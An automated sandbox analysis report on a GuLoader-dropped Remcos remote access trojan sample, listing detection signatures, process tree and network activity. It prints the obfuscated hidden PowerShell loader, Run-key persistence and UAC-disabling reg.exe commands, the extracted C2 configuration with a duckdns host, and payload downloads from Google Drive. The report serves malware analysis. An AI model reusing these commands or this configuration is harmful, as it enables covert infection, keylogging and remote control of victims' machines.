
Windows Analysis Report
anziOUzZJs.exe

Overview

General Information

Sample name: anziOUzZJs.exe (renamed because original name is a hash value)
Original sample name: 39f1703e13bdc112f4ffe9240f70cd5eb5b07cc218e6b22a8d58e4dcfaadd0a1.exe
Analysis ID: 1502984
MD5: 61bdbe7854f1572202f7916cf7f03616
SHA1: e03a3385bc0cd5869c2a8cc72c80f4115b7b7945
SHA256: 39f1703e13bdc112f4ffe9240f70cd5eb5b07cc218e6b22a8d58e4dcfaadd0a1
Tags: exe, GuLoader

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Remcos RAT
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Disables UAC (registry)
Drops PE files with a suspicious file extension
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Powershell drops PE file
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Uses cmd line tools excessively to alter registry or file data
Uses dynamic DNS services
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE / OLE file has an invalid certificate
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: Use Short Name Path in Command Line
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • anziOUzZJs.exe (PID: 7248 cmdline: "C:\Users\user\Desktop\anziOUzZJs.exe" MD5: 61BDBE7854F1572202F7916CF7F03616)
    • powershell.exe (PID: 7800 cmdline: "powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7812 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preferentialist" /t REG_EXPAND_SZ /d "%Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\Corycia\').mandskaber;%Therapeutic% ($Terrain)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 7264 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preferentialist" /t REG_EXPAND_SZ /d "%Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\Corycia\').mandskaber;%Therapeutic% ($Terrain)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • cmd.exe (PID: 1056 cmdline: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 4308 cmdline: C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • WerFault.exe (PID: 5192 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7800 -s 3448 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 6108 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7800 -s 2384 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 2176 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": "PP9.duckdns.org:3256:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-7CSH4D", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source | Rule | Description | Author | Strings
0000000A.00000002.2009656049.0000000008137000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
0000000A.00000002.2007087274.00000000070D0000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
0000000A.00000002.2002199771.0000000002B58000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
Process Memory Space: powershell.exe PID: 7800 | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton | Data: Command: "powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)", CommandLine: "powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\anziOUzZJs.exe", ParentImage: C:\Users\user\Desktop\anziOUzZJs.exe, ParentProcessId: 7248, ParentProcessName: anziOUzZJs.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)", ProcessId: 7800, ProcessName: powershell.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: %Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\Corycia\').mandskaber;%Therapeutic% ($Terrain), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 7264, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Preferentialist
Source: Process started | Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community | Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preferentialist" /t REG_EXPAND_SZ /d "%Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\Corycia\').mandskaber;%Therapeutic% ($Terrain)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preferentialist" /t REG_EXPAND_SZ /d "%Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\Corycia\').mandskaber;%Therapeutic% ($Terrain)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preferentialist" /t REG_EXPAND_SZ /d "%Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\Corycia\').mandskaber;%Therapeutic% ($Terrain)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7812, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preferentialist" /t REG_EXPAND_SZ /d "%Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\Corycia\').mandskaber;%Therapeutic% ($Terrain)", ProcessId: 7264, ProcessName: reg.exe
Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7800, TargetFilename: C:\Users\user\AppData\Local\Temp\Partivarerne.scr
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preferentialist" /t REG_EXPAND_SZ /d "%Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\Corycia\').mandskaber;%Therapeutic% ($Terrain)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preferentialist" /t REG_EXPAND_SZ /d "%Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\Corycia\').mandskaber;%Therapeutic% ($Terrain)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7800, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preferentialist" /t REG_EXPAND_SZ /d "%Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\Corycia\').mandskaber;%Therapeutic% ($Terrain)", ProcessId: 7812, ProcessName: cmd.exe
Source: File created | Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io | Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7800, TargetFilename: C:\Users\user\AppData\Local\Temp\Partivarerne.scr
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7800, TargetFilename: C:\Users\user\AppData\Local\Temp\Partivarerne.scr
Source: Process started | Author: frack113, Nasreddine Bencherchali | Data: Command: "powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)", CommandLine: "powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\anziOUzZJs.exe", ParentImage: C:\Users\user\Desktop\anziOUzZJs.exe, ParentProcessId: 7248, ParentProcessName: anziOUzZJs.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)", ProcessId: 7800, ProcessName: powershell.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)", CommandLine: "powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\anziOUzZJs.exe", ParentImage: C:\Users\user\Desktop\anziOUzZJs.exe, ParentProcessId: 7248, ParentProcessName: anziOUzZJs.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)", ProcessId: 7800, ProcessName: powershell.exe
Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 2176, ProcessName: svchost.exe

Stealing of Sensitive Information

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7800, TargetFilename: C:\ProgramData\remcos\logs.dat
Timestamp: 2024-09-02T16:20:41.195073+0200
SID: 2803270
Severity: 2
Source Port: 49726
Destination Port: 443
Protocol: TCP
Classtype: Potentially Bad Traffic

AV Detection

Source: 0000000A.00000002.2007087274.00000000070D0000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": "PP9.duckdns.org:3256:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-7CSH4D", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source: C:\Users\user\AppData\Local\Temp\Partivarerne.scr | ReversingLabs: Detection: 52%
Source: anziOUzZJs.exe | ReversingLabs: Detection: 52%
Source: Yara match | File source: 0000000A.00000002.2009656049.0000000008137000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2007087274.00000000070D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2002199771.0000000002B58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7800, type: MEMORYSTR
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 81.8% probability
Source: anziOUzZJs.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.7:49726 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.7:49729 version: TLS 1.2
Source: anziOUzZJs.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\anziOUzZJs.exe | Code function: 0_2_00405FFD FindFirstFileA,FindClose,0_2_00405FFD
Source: C:\Users\user\Desktop\anziOUzZJs.exe | Code function: 0_2_0040559B GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_0040559B
Source: C:\Users\user\Desktop\anziOUzZJs.exe | Code function: 0_2_00402688 FindFirstFileA,0_2_00402688
Source: C:\Users\user\Desktop\anziOUzZJs.exe | File opened: C:\Users\user
Source: C:\Users\user\Desktop\anziOUzZJs.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Users\user\Desktop\anziOUzZJs.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Users\user\Desktop\anziOUzZJs.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Users\user\Desktop\anziOUzZJs.exe | File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\anziOUzZJs.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts

Networking

Source: Malware configuration extractor | URLs: PP9.duckdns.org
Source: unknown | DNS query: name: a458386d9.duckdns.org
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49726 -> 142.250.184.238:443
Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=12MtvGq1mcjx6u74x3n7vw_RWb57_mB-I HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: drive.google.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /download?id=12MtvGq1mcjx6u74x3n7vw_RWb57_mB-I&export=download HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Cache-Control: no-cache | Host: drive.usercontent.google.com | Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: drive.google.com
Source: global traffic | DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic | DNS traffic detected: DNS query: a458386d9.duckdns.org
Source: svchost.exe, 0000001A.00000002.2506873908.0000014BA0400000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.ver)
Source: qmgr.db.26.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.26.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.26.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.26.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.26.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.26.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.26.dr | String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: anziOUzZJs.exe, Partivarerne.scr.10.dr | String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: anziOUzZJs.exe, Partivarerne.scr.10.dr | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 0000000A.00000002.2005526525.0000000005A3F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000A.00000002.2003170907.0000000004B27000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000A.00000002.2009656049.0000000008179000.00000004.00000020.00020000.00000000.sdmp, anziOUzZJs.exe, Partivarerne.scr.10.dr | String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: powershell.exe, 0000000A.00000002.2009656049.0000000008179000.00000004.00000020.00020000.00000000.sdmp, anziOUzZJs.exe, Partivarerne.scr.10.dr | String found in binary or memory: http://s.symcd.com06
Source: powershell.exe, 0000000A.00000002.2003170907.00000000049D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000A.00000002.2009656049.0000000008179000.00000004.00000020.00020000.00000000.sdmp, anziOUzZJs.exe, Partivarerne.scr.10.dr | String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: powershell.exe, 0000000A.00000002.2009656049.0000000008179000.00000004.00000020.00020000.00000000.sdmp, anziOUzZJs.exe, Partivarerne.scr.10.dr | String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: powershell.exe, 0000000A.00000002.2009656049.0000000008179000.00000004.00000020.00020000.00000000.sdmp, anziOUzZJs.exe, Partivarerne.scr.10.dr | String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: Amcache.hve.33.dr | String found in binary or memory: http://upx.sf.net
Source: powershell.exe, 0000000A.00000002.2003170907.0000000004B27000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000A.00000002.2003170907.00000000049D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 0000000A.00000002.2005526525.0000000005A3F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000A.00000002.2005526525.0000000005A3F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000A.00000002.2005526525.0000000005A3F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000A.00000002.2009656049.0000000008179000.00000004.00000020.00020000.00000000.sdmp, anziOUzZJs.exe, Partivarerne.scr.10.dr | String found in binary or memory: https://d.symcb.com/cps0%
          Source: powershell.exe, 0000000A.00000002.2009656049.0000000008179000.00000004.00000020.00020000.00000000.sdmp, anziOUzZJs.exe, Partivarerne.scr.10.drString found in binary or memory: https://d.symcb.com/rpa0
          Source: powershell.exe, 0000000A.00000002.2009656049.0000000008179000.00000004.00000020.00020000.00000000.sdmp, anziOUzZJs.exe, Partivarerne.scr.10.drString found in binary or memory: https://d.symcb.com/rpa0.
          Source: powershell.exe, 0000000A.00000002.2007087274.000000000715C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
          Source: powershell.exe, 0000000A.00000002.2007087274.000000000715C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com//
          Source: powershell.exe, 0000000A.00000002.2009656049.00000000080D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2010246217.0000000008330000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2007087274.000000000715C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=12MtvGq1mcjx6u74x3n7vw_RWb57_mB-I
          Source: powershell.exe, 0000000A.00000002.2007087274.00000000070D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2002199771.0000000002BAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
          Source: powershell.exe, 0000000A.00000002.2002199771.0000000002BAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/1$T
          Source: powershell.exe, 0000000A.00000002.2007087274.000000000719E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2007087274.00000000071B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2009656049.00000000080D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2007087274.000000000715C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=12MtvGq1mcjx6u74x3n7vw_RWb57_mB-I&export=download
          Source: edb.log.26.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
          Source: svchost.exe, 0000001A.00000003.1875644629.0000014BA02D0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.26.dr, edb.log.26.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
          Source: powershell.exe, 0000000A.00000002.2003170907.0000000004B27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 0000000A.00000002.2005526525.0000000005A3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: qmgr.db.26.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe1C:
          Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
          Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.7:49726 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.7:49729 version: TLS 1.2

          Key, Mouse, Clipboard, Microphone and Screen Capturing

          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Windows user hook set: 0 keyboard low level C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          Source: C:\Users\user\Desktop\anziOUzZJs.exe | Code function: 0_2_00405050 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard

          E-Banking Fraud

